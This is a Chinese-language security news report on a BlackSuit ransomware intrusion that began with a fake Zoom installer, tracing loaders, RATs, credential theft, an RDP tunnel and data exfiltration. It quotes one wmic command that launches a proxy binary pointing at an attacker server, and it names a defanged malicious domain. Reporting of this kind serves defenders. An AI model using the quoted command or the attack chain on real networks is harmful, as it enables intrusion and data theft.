网络犯罪分子最近利用一个虚假的 Zoom 安装程序，在一家企业网络中部署了 BlackSuit 勒索软件。

攻击始于一名毫无防备的受害者访问了一个模仿 Zoom 官方下载页面（zoommanager [.] com）的恶意网站，在该网站上，受害者下载了一个看似合法的电话会议应用程序安装程序。

这个经过恶意改造的安装程序是使用 Inno Setup 工具创建的，其中包含一个名为 “d3f@ckloader” 的恶意下载器，它是基于 Pascal 脚本语言构建的。

在初始阶段，恶意软件通过将安装目录添加到 Windows Defender 的排除列表中，并将文件标记为隐藏，来实现持久驻留。

然后，该恶意软件连接到一个 Steam 社区个人资料页面，以获取托管第二阶段恶意软件的 IP 地址。

The DFIR Report 的研究人员指出，在从命令与控制服务器下载了两个 ZIP 压缩文件后，恶意软件既执行了合法的 Zoom 安装程序（以维持正常的假象），也执行了恶意有效载荷。

这导致 SectopRAT 远程控制木马被注入到 MSBuild.exe 进程中，它通过一个启动项实现了初始的持久驻留。

在潜伏了九天之后，当 SectopRAT 远程控制木马在整个网络中部署了 Brute Ratel（被称为Badgers）和 Cobalt Strike 信标时，攻击进一步升级。

这些工具通过从 LSASS 内存中获取凭据，并利用 Windows 远程服务创建功能实现了横向移动。

用于网络遍历的RDP隧道技术

这次入侵最值得注意的一点是，攻击者使用了一个名为 QDoor 的代理工具，在整个网络环境中建立了 RDP 访问权限。

恶意软件被部署在域控制器上，并被配置为将流量代理到攻击者控制的服务器（143.244.146 [.] 183）。

% WINDIR%\system32\cmd.exe/C wmic /node:”REDACTED” process call create “% WINDIR%\Temp\svhost.exe”143.244.146 [.] 183″”

这种隧道技术使威胁行为者能够通过被攻陷的域控制器建立远程桌面连接，从而访问文件服务器。在文件服务器上，他们部署了 WinRAR 来压缩敏感数据。

然后，攻击者在使用 PsExec 工具进行远程执行以部署 BlackSuit 勒索软件之前，利用云存储服务 Bublup 窃取了大约 934MB 的数据。

这种复杂的多阶段攻击链条，再加上为期九天的潜伏时间，显示出威胁行为者的耐心以及他们为了最大限度地实现数据窃取和加密影响而采取的有条不紊的攻击方式。

文章原文链接:https://www.anquanke.com/post/id/306070